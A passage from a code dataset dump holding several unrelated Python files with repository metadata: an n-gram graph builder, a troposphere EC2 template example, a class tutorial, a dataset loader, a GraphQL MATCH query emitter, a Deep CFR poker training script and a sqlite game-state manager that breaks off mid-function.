window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph
| """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
# an extension of DocumentNGramGraph
# for symmetric windowing
def buildGraph(self,verbose = False, d=[]):
# set Data @class_variable
self.setData(d)
Data = self._Data
# build ngram
ng = self.build_ngram()
s = len(ng)
# calculate window
win = self._Dwin//2
# initialize graph
self._Graph = nx.Graph()
if(s>=2 and win>=1):
# max possible window size (bounded by win)
o = min(win,s)+1
window = ng[1:o]
i = o
# first build the full window
for gram in ng[0:s-1]:
for w in window:
self.addEdgeInc(gram,w)
window.pop(0)
# if window's edge has reached
# it's the limit of ng stop
# appending
if i<s:
window.append(ng[i][:])
i+=1
# print Graph (optional)
if verbose:
self.GraphDraw(self._GPrintVerbose)
return self._Graph | en | 0.845614 | DocumentNGramSymWinGraph.py Created on May 23, 2017, 4:56 PM # an extension of DocumentNGramGraph # for symmetric windowing # set Data @class_variable # build ngram # calculate window # initialize graph # max possible window size (bounded by win) # first build the full window # if window's edge has reached # it's the limit of ng stop # appending # print Graph (optional) | 2.929513 | 3 |
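An illustrative build of the symmetric-window graph above. The input string is made up, and the n-gram size and window fall back to whatever defaults the DocumentNGramGraph base class sets.
g = DocumentNGramSymWinGraph()
graph = g.buildGraph(d="symmetric_window_demo_text")
print(graph.number_of_nodes(), "nodes,", graph.number_of_edges(), "edges")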
examples/EC2Conditions.py | DrLuke/troposphere | 1 | 10334 | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("OneEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
parameters = {
"One": Parameter(
"One",
Type="String",
),
"Two": Parameter(
"Two",
Type="String",
),
"Three": Parameter(
"Three",
Type="String",
),
"Four": Parameter(
"Four",
Type="String",
),
"SshKeyName": Parameter(
"SshKeyName",
Type="String",
)
}
conditions = {
"OneEqualsFoo": Equals(
Ref("One"),
"Foo"
),
"NotOneEqualsFoo": Not(
Condition("OneEqualsFoo")
),
"BarEqualsTwo": Equals(
"Bar",
Ref("Two")
),
"ThreeEqualsFour": Equals(
Ref("Three"),
Ref("Four")
),
"OneEqualsFooOrBarEqualsTwo": Or(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo")
),
"OneEqualsFooAndNotBarEqualsTwo": And(
Condition("OneEqualsFoo"),
Not(Condition("BarEqualsTwo"))
),
"OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
Condition("OneEqualsFoo"),
Condition("BarEqualsTwo"),
Equals(Ref("Three"), "Pft")
),
"OneIsQuzAndThreeEqualsFour": And(
Equals(Ref("One"), "Quz"),
Condition("ThreeEqualsFour")
),
"LaunchInstance": And(
Condition("OneEqualsFoo"),
Condition("NotOneEqualsFoo"),
Condition("BarEqualsTwo"),
Condition("OneEqualsFooAndNotBarEqualsTwo"),
Condition("OneIsQuzAndThreeEqualsFour")
),
"LaunchWithGusto": And(
Condition("LaunchInstance"),
Equals(Ref("One"), "Gusto")
)
}
resources = {
"Ec2Instance": ec2.Instance(
"Ec2Instance",
Condition="LaunchInstance",
ImageId=If("OneEqualsFoo", "ami-12345678", "ami-87654321"),
InstanceType="t1.micro",
KeyName=Ref("SshKeyName"),
SecurityGroups=["default"],
)
}
t = Template()
for p in parameters.values():
t.add_parameter(p)
for k in conditions:
t.add_condition(k, conditions[k])
for r in resources.values():
t.add_resource(r)
print(t.to_json())
| none | 1 | 2.65585 | 3 |
|
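The same Equals condition pattern from the record above, reduced to a minimal standalone template for reference:
from troposphere import Template, Parameter, Ref, Equals
t = Template()
t.add_parameter(Parameter("One", Type="String"))
# Fn::If elsewhere in a template picks its first value when this condition holds
t.add_condition("OneEqualsFoo", Equals(Ref("One"), "Foo"))
print(t.to_json())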
fist_phase/08_objects.py | kapuni/exercise_py | 0 | 10335 | class Student(object):
# __init__ is a special method used to run initialization when an object is created
# Through this method we can bind the name and age attributes to a student object
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s is studying %s.' % (self.name, course_name))
# PEP 8 requires identifier names to be all lowercase with words joined by underscores
# but some programmers and companies prefer camelCase naming (camel case)
def watch_movie(self):
if self.age < 18:
print('%s can only watch "Boonie Bears".' % self.name)
else:
print('%s is watching an adult movie.' % self.name)
def main():
# Create student objects and specify their name and age
stu1 = Student('骆昊', 38)
# Send the study message to the object
stu1.study('Python Programming')
# Send the watch_av message to the object
stu1.watch_movie()
stu2 = Student('王大锤', 15)
stu2.study('Ethics')
stu2.watch_movie()
if __name__ == '__main__':
main() | class Student(object):
# __init__ is a special method used to run initialization when an object is created
# Through this method we can bind the name and age attributes to a student object
def __init__(self, name, age):
self.name = name
self.age = age
def study(self, course_name):
print('%s is studying %s.' % (self.name, course_name))
# PEP 8 requires identifier names to be all lowercase with words joined by underscores
# but some programmers and companies prefer camelCase naming (camel case)
def watch_movie(self):
if self.age < 18:
print('%s can only watch "Boonie Bears".' % self.name)
else:
print('%s is watching an adult movie.' % self.name)
def main():
# Create student objects and specify their name and age
stu1 = Student('骆昊', 38)
# Send the study message to the object
stu1.study('Python Programming')
# Send the watch_av message to the object
stu1.watch_movie()
stu2 = Student('王大锤', 15)
stu2.study('Ethics')
stu2.watch_movie()
if __name__ == '__main__':
main() | zh | 0.981659 | # __init__ is a special method used to run initialization when an object is created # Through this method we can bind the name and age attributes to a student object # PEP 8 requires identifier names to be all lowercase with words joined by underscores # but some programmers and companies prefer camelCase naming (camel case) # Create student objects and specify their name and age # Send the study message to the object # Send the watch_av message to the object | 4.038315 | 4 |
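The same message-passing idea from the record, shown once more with a third, invented student:
stu3 = Student('Alice', 20)
stu3.study('Algorithms')  # prints: Alice is studying Algorithms.
stu3.watch_movie()        # takes the age >= 18 branch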
lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 57 | 10336 | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
def load(dataset: str, force_new: bool = False):
for part in DatasetPart:
dataset_name = dataset + '_' + part.name.lower()
# load dataset (generate Documents and TextElements)
if force_new:
single_dataset_loader.clear_all_saved_files(dataset_name)
single_dataset_loader.load_dataset(dataset_name, force_new)
# load gold labels
if force_new:
gold_labels_loader.clear_gold_labels_file(dataset_name)
gold_labels_loader.load_gold_labels(dataset_name, force_new)
logging.info('-' * 60)
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | en | 0.45673 | # (c) Copyright IBM Corporation 2020. # LICENSE: Apache License 2.0 (Apache-2.0) # http://www.apache.org/licenses/LICENSE-2.0 # load dataset (generate Documents and TextElements) # load gold labels | 2.109836 | 2 |
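A hypothetical invocation of the loader above that forces the cached dataset files and gold labels to be rebuilt:
load(dataset='polarity', force_new=True)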
graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 0 | 10337 |
"""Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
"""Transform the very first MATCH step into a MATCH query string."""
parts = []
if match_step.root_block is not None:
if not isinstance(match_step.root_block, QueryRoot):
raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
match_step.root_block.validate()
start_class = get_only_element_from_collection(match_step.root_block.start_class)
parts.append(u"class: %s" % (start_class,))
if match_step.coerce_type_block is not None:
raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if match_step.as_block is None:
raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
else:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
"""Transform any subsequent (non-first) MATCH step into a MATCH query string."""
if not isinstance(match_step.root_block, (Traverse, Recurse)):
raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
is_recursing = isinstance(match_step.root_block, Recurse)
match_step.root_block.validate()
traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
parts = []
if match_step.coerce_type_block:
coerce_type_set = match_step.coerce_type_block.target_class
if len(coerce_type_set) != 1:
raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
coerce_type_target = list(coerce_type_set)[0]
parts.append(u"class: %s" % (coerce_type_target,))
if is_recursing:
parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
if match_step.where_block:
match_step.where_block.validate()
parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
if not is_recursing and match_step.root_block.optional:
parts.append(u"optional: true")
if match_step.as_block:
match_step.as_block.validate()
parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
"""Emit MATCH query code for an entire MATCH traversal sequence."""
output = []
output.append(_first_step_to_match(match_traversal[0]))
for step in match_traversal[1:]:
output.append(_subsequent_step_to_match(step))
return u"".join(output)
def _represent_fold(fold_location, fold_ir_blocks):
"""Emit a LET clause corresponding to the IR blocks for a @fold scope."""
start_let_template = u"$%(mark_name)s = %(base_location)s"
traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
base_template = start_let_template + traverse_edge_template
edge_direction, edge_name = fold_location.get_first_folded_edge()
mark_name, _ = fold_location.get_location_name()
base_location_name, _ = fold_location.base_location.get_location_name()
validate_safe_string(mark_name)
validate_safe_string(base_location_name)
validate_safe_string(edge_direction)
validate_safe_string(edge_name)
template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
final_string = base_template % template_data
for block in fold_ir_blocks:
if isinstance(block, Filter):
final_string += u"[" + block.predicate.to_match() + u"]"
elif isinstance(block, Traverse):
template_data = {"direction": block.direction, "edge_name": block.edge_name}
final_string += traverse_edge_template % template_data
elif isinstance(block, MarkLocation):
pass
else:
raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
final_string += ".asList()"
return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
"""Transform a Filter block into a MATCH query string."""
if where_block.predicate == TrueLiteral:
raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
"""Return a MATCH query string from a list of IR blocks."""
query_data = deque([u"MATCH "])
if not match_query.match_traversals:
raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
query_data.append(match_traversal_data[0])
for traversal_data in match_traversal_data[1:]:
query_data.append(u", ")
query_data.append(traversal_data)
query_data.appendleft(u" (")
query_data.append(u"RETURN $matches)")
fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
if fold_data:
query_data.append(u" LET ")
query_data.append(fold_data[0])
for fold_clause in fold_data[1:]:
query_data.append(u", ")
query_data.append(fold_clause)
query_data.appendleft(_construct_output_to_match(match_query.output_block))
if match_query.where_block is not None:
query_data.append(_construct_where_to_match(match_query.where_block))
return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
"""Return a MATCH query string from a list of MatchQuery namedtuples."""
optional_variable_base_name = "$optional__"
union_variable_name = "$result"
query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
optional_variables = []
sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
for (i, sub_query) in enumerate(sub_queries):
variable_name = optional_variable_base_name + str(i)
variable_assignment = variable_name + u" = ("
sub_query_end = u"),"
query_data.append(variable_assignment)
query_data.append(sub_query)
query_data.append(sub_query_end)
optional_variables.append(variable_name)
query_data.append(union_variable_name)
query_data.append(u" = UNIONALL(")
query_data.append(u", ".join(optional_variables))
query_data.append(u")")
return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
"""Return a MATCH query string from a CompoundMatchQuery."""
match_queries = compound_match_query.match_queries
if len(match_queries) == 1:
query_string = emit_code_from_single_match_query(match_queries[0])
elif len(match_queries) > 1:
query_string = emit_code_from_multiple_match_queries(match_queries)
else:
raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
return query_string | en | 0.82796 | Convert lowered IR basic blocks to MATCH query strings. Get the location name from a location that is expected to point to a vertex. Transform the very first MATCH step into a MATCH query string. Transform any subsequent (non-first) MATCH step into a MATCH query string. Emit MATCH query code for an entire MATCH traversal sequence. Emit a LET clause corresponding to the IR blocks for a @fold scope. Transform a ConstructResult block into a MATCH query string. Transform a Filter block into a MATCH query string. Return a MATCH query string from a list of IR blocks. Return a MATCH query string from a list of MatchQuery namedtuples. Return a MATCH query string from a CompoundMatchQuery. | 2.736345 | 3 |
mo_leduc.py | mohamedun/Deep-CFR | 0 | 10338 | <gh_stars>0
from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace()  # deliberate breakpoint: drops into the debugger once training and evaluation finish
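# Hedged follow-up sketch: if the standard PokerRL export API applies here, an agent
# exported via eval_agent_export_freq can be reloaded for evaluation, e.g.
#   agent = EvalAgentDeepCFR.load_from_disk(path_to_eval_agent="<export_dir>/eval_agent.pkl")
# (the path is hypothetical; exports land under the trainer's configured log directory).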
| from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
nn_type="feedforward",
eval_agent_export_freq=3,
checkpoint_freq=3,
n_learner_actor_workers=5,
max_buffer_size_adv=1e6,
n_traversals_per_iter=500,
n_batches_adv_training=250,
mini_batch_size_adv=2048,
game_cls=BigLeduc,
n_units_final_adv=64,
n_merge_and_table_layer_units_adv=64,
init_adv_model="random", # warm start neural weights with init from last iter
use_pre_layers_adv=False, # shallower nets
use_pre_layers_avrg=False, # shallower nets
# You can specify one or both modes. Choosing both is useful to compare them.
eval_modes_of_algo=(
EvalAgentDeepCFR.EVAL_MODE_SINGLE, # SD-CFR
),
DISTRIBUTED=True,
log_verbose=True,
rl_br_args=RLBRArgs(rlbr_bet_set=None,
n_hands_each_seat=200,
n_workers=1,
# Training
DISTRIBUTED=False,
n_iterations=100,
play_n_games_per_iter=50,
# The DDQN
batch_size=512,
),
lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
n_parallel_lbr_workers=10,
DISTRIBUTED=True,
),
),
eval_methods={'br': 1,
#'rlbr': 1,
'lbr': 1,
},
n_iterations=12)
ctrl.run()
pdb.set_trace() | en | 0.785843 | # warm start neural weights with init from last iter # shallower nets # shallower nets # You can specify one or both modes. Choosing both is useful to compare them. # SD-CFR # Training # The DDQN #'rlbr': 1, | 1.854403 | 2 |
geocircles/backend/gamestate.py | tmick0/geocircles | 0 | 10339 | <gh_stars>0
import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
